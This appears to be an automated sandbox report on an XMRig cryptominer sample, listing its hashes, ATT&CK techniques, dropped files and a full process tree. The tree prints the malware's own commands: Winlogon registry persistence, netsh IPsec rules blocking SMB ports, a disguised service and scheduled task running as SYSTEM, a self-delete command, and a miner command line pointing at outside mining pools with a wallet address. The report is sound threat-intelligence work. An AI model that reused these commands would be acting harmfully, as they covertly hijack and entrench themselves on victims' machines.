xmrig | c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

Analysis

max time kernel
151s
max time network
149s
platform
windows7_x64
resource
win7v20210410
submitted
07-05-2021 12:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aa.exe
Size

28.1MB
MD5

8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1

689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256

c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA512

12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

Score

10^/10

xmrig miner persistence

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

CSIYOE.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\HWtlM\\CSIYOE.exe"	CSIYOE.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

XMRig Miner Payload 7 IoCs

miner

Processes:

resource	yara_rule
\Windows\HWtlM\CSIYOE.exe	xmrig
\Windows\HWtlM\CSIYOE.exe	xmrig
C:\Windows\HWtlM\CSIYOE.exe	xmrig
C:\Windows\HWtlM\CSIYOE.exe	xmrig
\Windows\HWtlM\QW.exe	xmrig
C:\Windows\HWtlM\QW.exe	xmrig
\Windows\HWtlM\QW.exe	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Executes dropped EXE 2 IoCs

Processes:

CSIYOE.exeQW.exe

pid process

1164 CSIYOE.exe
1672 QW.exe
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1248 cmd.exe
Loads dropped DLL 4 IoCs

Processes:

aa.exeCSIYOE.exe

pid process

1360 aa.exe
1360 aa.exe
1164 CSIYOE.exe
1884

pid	process
1248	cmd.exe

pid	process
1360	aa.exe
1360	aa.exe
1164	CSIYOE.exe
1884

Drops file in Windows directory 64 IoCs

Processes:

CSIYOE.exeaa.exe

description	ioc	process
File created	C:\Windows\HWtlM\adfw-2.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\libxml2.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\pcla-0.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\trch-1.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\CSIYOE.exe	aa.exe
File created	C:\Windows\HWtlM\exma-1.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\libcurl.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\posh-0.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\zlib1.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\TFf	CSIYOE.exe
File created	C:\Windows\HWtlM\etch-0.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\iconv.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\ip.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\dmgd-4.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\posh.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\ssleay32.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\tibe-1.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\trfo-0.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\xdvl-0.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\WinRing0x64.sys	CSIYOE.exe
File created	C:\Windows\HWtlM\eteb-2.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\etchCore-0.x86.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\etebCore-2.x86.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\pcrecpp-0.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\riar.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\crli-0.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\adfw.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\esco-0.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\pcre-0.dll	CSIYOE.exe
File created	C:\Windows\end.bat	CSIYOE.exe
File created	C:\Windows\HWtlM\cnli-0.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\etebCore-2.x64.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\exma.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\tucl-1.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\QW.exe	CSIYOE.exe
File created	C:\Windows\HWtlM\qdx.bat	CSIYOE.exe
File created	C:\Windows\HWtlM\Cstr.exe	CSIYOE.exe
File created	C:\Windows\HWtlM\trch-0.dll	CSIYOE.exe
File created	C:\Windows\boy.exe	aa.exe
File created	C:\Windows\HWtlM\chrome..exe	CSIYOE.exe
File created	C:\Windows\HWtlM\tibe.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\tucl.dll	CSIYOE.exe
File opened for modification	C:\Windows\end.bat	CSIYOE.exe
File created	C:\Windows\HWtlM\cnli-1.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\dmgd-1.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\tibe-2.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\trfo.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\tscl.html	aa.exe
File created	C:\Windows\HWtlM\chrome..fb	CSIYOE.exe
File created	C:\Windows\HWtlM\Cstr.fb	CSIYOE.exe
File created	C:\Windows\HWtlM\chrome..xml	CSIYOE.exe
File created	C:\Windows\HWtlM\Cstr.xml	CSIYOE.exe
File created	C:\Windows\HWtlM\zibe.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\pcreposix-0.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\libeay32.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\libiconv-2.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\trfo-2.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\ucl.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\coli-0.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\riar-2.dll	CSIYOE.exe
File created	C:\Windows\HWtlM\trch.dll	CSIYOE.exe
File opened for modification	C:\Windows\HWtlM\tscl.html	CSIYOE.exe
File created	C:\Windows\HWtlM\etchCore-0.x64.dll	CSIYOE.exe
File created	C:\Windows\IME\tps.exe	aa.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

588 schtasks.exe

pid	process
588	schtasks.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

CSIYOE.exe

pid	process
1164	CSIYOE.exe
1164	CSIYOE.exe
1164	CSIYOE.exe
1164	CSIYOE.exe
1164	CSIYOE.exe
1164	CSIYOE.exe
1164	CSIYOE.exe
1164	CSIYOE.exe
1164	CSIYOE.exe
1164	CSIYOE.exe
1164	CSIYOE.exe
1164	CSIYOE.exe
1164	CSIYOE.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

QW.exe

description pid process

Token: SeLockMemoryPrivilege 1672 QW.exe
Token: SeLockMemoryPrivilege 1672 QW.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

aa.exeCSIYOE.exe

pid process

1360 aa.exe
1360 aa.exe
1164 CSIYOE.exe
1164 CSIYOE.exe

description	pid	process
Token: SeLockMemoryPrivilege	1672	QW.exe
Token: SeLockMemoryPrivilege	1672	QW.exe

pid	process
1360	aa.exe
1360	aa.exe
1164	CSIYOE.exe
1164	CSIYOE.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

aa.exeCSIYOE.execmd.execmd.exe

description	pid	process	target process
PID 1360 wrote to memory of 1164	1360	aa.exe	CSIYOE.exe
PID 1360 wrote to memory of 1164	1360	aa.exe	CSIYOE.exe
PID 1360 wrote to memory of 1164	1360	aa.exe	CSIYOE.exe
PID 1360 wrote to memory of 1164	1360	aa.exe	CSIYOE.exe
PID 1360 wrote to memory of 1248	1360	aa.exe	cmd.exe
PID 1360 wrote to memory of 1248	1360	aa.exe	cmd.exe
PID 1360 wrote to memory of 1248	1360	aa.exe	cmd.exe
PID 1360 wrote to memory of 1248	1360	aa.exe	cmd.exe
PID 1164 wrote to memory of 572	1164	CSIYOE.exe	cmd.exe
PID 1164 wrote to memory of 572	1164	CSIYOE.exe	cmd.exe
PID 1164 wrote to memory of 572	1164	CSIYOE.exe	cmd.exe
PID 1164 wrote to memory of 572	1164	CSIYOE.exe	cmd.exe
PID 572 wrote to memory of 300	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 300	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 300	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 300	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1208	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1208	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1208	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1208	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1480	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1480	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1480	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1480	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1668	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1668	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1668	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1668	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1744	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1744	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1744	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1744	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1708	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1708	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1708	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1708	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1624	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1624	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1624	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1624	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 552	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 552	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 552	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 552	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1256	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1256	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1256	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1256	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 668	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 668	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 668	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 668	572	cmd.exe	netsh.exe
PID 1164 wrote to memory of 1112	1164	CSIYOE.exe	cmd.exe
PID 1164 wrote to memory of 1112	1164	CSIYOE.exe	cmd.exe
PID 1164 wrote to memory of 1112	1164	CSIYOE.exe	cmd.exe
PID 1164 wrote to memory of 1112	1164	CSIYOE.exe	cmd.exe
PID 1164 wrote to memory of 856	1164	CSIYOE.exe	cmd.exe
PID 1164 wrote to memory of 856	1164	CSIYOE.exe	cmd.exe
PID 1164 wrote to memory of 856	1164	CSIYOE.exe	cmd.exe
PID 1164 wrote to memory of 856	1164	CSIYOE.exe	cmd.exe
PID 1112 wrote to memory of 1604	1112	cmd.exe	netsh.exe
PID 1112 wrote to memory of 1604	1112	cmd.exe	netsh.exe
PID 1112 wrote to memory of 1604	1112	cmd.exe	netsh.exe
PID 1112 wrote to memory of 1604	1112	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\aa.exe
"C:\Users\Admin\AppData\Local\Temp\aa.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1360

C:\Windows\HWtlM\CSIYOE.exe
C:\Windows\HWtlM\CSIYOE.exe
2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1164

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\end.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:572

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:300

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:1208

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:1480

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:1668

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:1744

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:1708

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:1624

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:552

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:1256

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:668

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\end.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1112

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:1604

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:512

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:300

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:572

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:1704

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:1612

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:1892

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:316

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:1360

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:616

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\end.bat" "
3⤵
PID:856

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:1272

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:1628

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:468

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:2004

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:1896

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:1624

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:888

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:656

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:796

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:1688

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\end.bat" "
3⤵
PID:756

C:\Windows\SysWOW64\sc.exe
sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"
3⤵
PID:2012

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\HWtlM\qdx.bat" "
3⤵
PID:864

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\HWtlM\CSIYOE.exe" /SC ONSTART
4⤵
- Creates scheduled task(s)
PID:588

C:\Windows\HWtlM\QW.exe
"C:\Windows\HWtlM\QW.exe" -o stratum+tcp://dns.monerogb.com:6502 -o stratum+tcp://note.monerogb.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"
2⤵
- Deletes itself
PID:1248

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Winlogon Helper DLL

T1004

New Service

T1050

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\HWtlM\CSIYOE.exe
MD5
8d9d7f5babe3ee15f2e93a4321fa45cf

SHA1
689d53ae66e75e0b5715c0d04a7cab20e5390790

SHA256
c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

SHA512
12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

Download Submit
C:\Windows\HWtlM\CSIYOE.exe
MD5
8d9d7f5babe3ee15f2e93a4321fa45cf

SHA1
689d53ae66e75e0b5715c0d04a7cab20e5390790

SHA256
c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

SHA512
12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

Download Submit
C:\Windows\HWtlM\QW.exe
MD5
90f9e1fdec81ccf508fc58f3d23156b5

SHA1
066783e092007d2bcd10e2bbf412269fb9260d3f

SHA256
d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018

SHA512
8463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95

Download Submit
C:\Windows\HWtlM\qdx.bat
MD5
3791074c6a9295ad1f6f28c793cd6df1

SHA1
6b963ab4513ca676340d8d18cc2dc6438c96c25d

SHA256
91b7a4a0dcb37175ef20673360e41645c7002f63e9ae76de0a3bc10f01393bb0

SHA512
00340700a537b5002162bebd1cba0cd7b5266b649e067b306db26426c0a4451786b98815fd1924d34971fffb1837aa09a4bdd5236368e50a0b47fc67453a7dd1

Download Submit
C:\Windows\HWtlM\tscl.html
MD5
6256004fb976b965e4112b9fbcb26f27

SHA1
2490faab9c9cc1d13b6a940797bdf646ef80c955

SHA256
0fd807b9f589470cddb98e3111d95e7ac136893e3c3ca6085d5482035de727b7

SHA512
4864d984a492010ce7d10777ef5e8b4fc10a340f54916600b36244e7072f06ab8ef8425a6236d063ef038cdf8aa41d2a77e479936c62cf221c2e28c45d252b27

Download Submit
C:\Windows\end.bat
MD5
c017d5f762ae5d67efb7d099b53cca58

SHA1
ab7f8553de7614251d76ce54aaee52f1a35e7ae6

SHA256
d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b

SHA512
856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78

Download Submit
C:\Windows\end.bat
MD5
c017d5f762ae5d67efb7d099b53cca58

SHA1
ab7f8553de7614251d76ce54aaee52f1a35e7ae6

SHA256
d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b

SHA512
856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78

Download Submit
\Windows\HWtlM\CSIYOE.exe
MD5
8d9d7f5babe3ee15f2e93a4321fa45cf

SHA1
689d53ae66e75e0b5715c0d04a7cab20e5390790

SHA256
c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

SHA512
12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

Download Submit
\Windows\HWtlM\CSIYOE.exe
MD5
8d9d7f5babe3ee15f2e93a4321fa45cf

SHA1
689d53ae66e75e0b5715c0d04a7cab20e5390790

SHA256
c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

SHA512
12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

Download Submit
\Windows\HWtlM\QW.exe
MD5
90f9e1fdec81ccf508fc58f3d23156b5

SHA1
066783e092007d2bcd10e2bbf412269fb9260d3f

SHA256
d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018

SHA512
8463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95

Download Submit
\Windows\HWtlM\QW.exe
MD5
90f9e1fdec81ccf508fc58f3d23156b5

SHA1
066783e092007d2bcd10e2bbf412269fb9260d3f

SHA256
d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018

SHA512
8463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95

Download Submit
memory/300-101-0x0000000000000000-mapping.dmp

Download
memory/300-69-0x0000000000000000-mapping.dmp

Download
memory/316-126-0x0000000000000000-mapping.dmp

Download
memory/468-100-0x0000000000000000-mapping.dmp

Download
memory/512-97-0x0000000000000000-mapping.dmp

Download
memory/552-83-0x0000000000000000-mapping.dmp

Download
memory/572-104-0x0000000000000000-mapping.dmp

Download
memory/572-67-0x0000000000000000-mapping.dmp

Download
memory/588-136-0x0000000000000000-mapping.dmp

Download
memory/616-130-0x0000000000000000-mapping.dmp

Download
memory/656-118-0x0000000000000000-mapping.dmp

Download
memory/668-87-0x0000000000000000-mapping.dmp

Download
memory/756-132-0x0000000000000000-mapping.dmp

Download
memory/796-120-0x0000000000000000-mapping.dmp

Download
memory/856-90-0x0000000000000000-mapping.dmp

Download
memory/864-134-0x0000000000000000-mapping.dmp

Download
memory/888-116-0x0000000000000000-mapping.dmp

Download
memory/1112-89-0x0000000000000000-mapping.dmp

Download
memory/1164-62-0x0000000000000000-mapping.dmp

Download
memory/1208-71-0x0000000000000000-mapping.dmp

Download
memory/1248-66-0x0000000000000000-mapping.dmp

Download
memory/1256-85-0x0000000000000000-mapping.dmp

Download
memory/1272-93-0x0000000000000000-mapping.dmp

Download
memory/1360-128-0x0000000000000000-mapping.dmp

Download
memory/1360-59-0x00000000752B1000-0x00000000752B3000-memory.dmp

Filesize
8KB

Download
memory/1480-73-0x0000000000000000-mapping.dmp

Download
memory/1604-92-0x0000000000000000-mapping.dmp

Download
memory/1612-112-0x0000000000000000-mapping.dmp

Download
memory/1624-113-0x0000000000000000-mapping.dmp

Download
memory/1624-81-0x0000000000000000-mapping.dmp

Download
memory/1628-96-0x0000000000000000-mapping.dmp

Download
memory/1668-75-0x0000000000000000-mapping.dmp

Download
memory/1672-143-0x00000000003E0000-0x0000000000400000-memory.dmp

Filesize
128KB

Download
memory/1672-142-0x0000000000280000-0x0000000000294000-memory.dmp

Filesize
80KB

Download
memory/1672-139-0x0000000000000000-mapping.dmp

Download
memory/1688-122-0x0000000000000000-mapping.dmp

Download
memory/1704-109-0x0000000000000000-mapping.dmp

Download
memory/1708-79-0x0000000000000000-mapping.dmp

Download
memory/1744-77-0x0000000000000000-mapping.dmp

Download
memory/1892-124-0x0000000000000000-mapping.dmp

Download
memory/1896-108-0x0000000000000000-mapping.dmp

Download
memory/2004-105-0x0000000000000000-mapping.dmp

Download
memory/2012-133-0x0000000000000000-mapping.dmp

Download